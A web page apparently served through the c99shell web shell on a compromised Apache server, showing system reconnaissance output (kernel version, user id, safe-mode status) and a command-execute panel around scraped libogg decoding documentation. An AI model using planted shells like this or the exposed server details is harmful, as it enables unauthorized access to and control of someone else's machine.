Software: Apache/2.0.54 (Fedora). PHP/5.0.4 uname -a: Linux mina-info.me 2.6.17-1.2142_FC4smp #1 SMP Tue Jul 11 22:57:02 EDT 2006 i686 uid=48(apache) gid=48(apache) groups=48(apache) Safe-mode: OFF (not secure) /usr/share/doc/libogg-devel-1.1.2/ogg/ drwxr-xr-x |
Viewing file: Select action/file-type:
DecodingLibogg contains a set of functions used in the decoding process. All the libogg specific functions are declared in "ogg/ogg.h".
Decoding is based around the ogg synchronization layer. The ogg_sync_state struct coordinates between incoming data and the decoder. We read data into the synchronization layer, submit the data to the stream, and output raw packets to the decoder. Decoding through the Ogg layer follows a specific logical sequence. A read loop follows these logical steps:
In practice, streams are more complex, and Ogg also must handle headers, incomplete or dropped pages, and other errors in input.
|
:: Command execute :: | |
--[ c99shell v. 1.0 pre-release build #16 powered by Captain Crunch Security Team | http://ccteam.ru | Generation time: 0.0029 ]-- |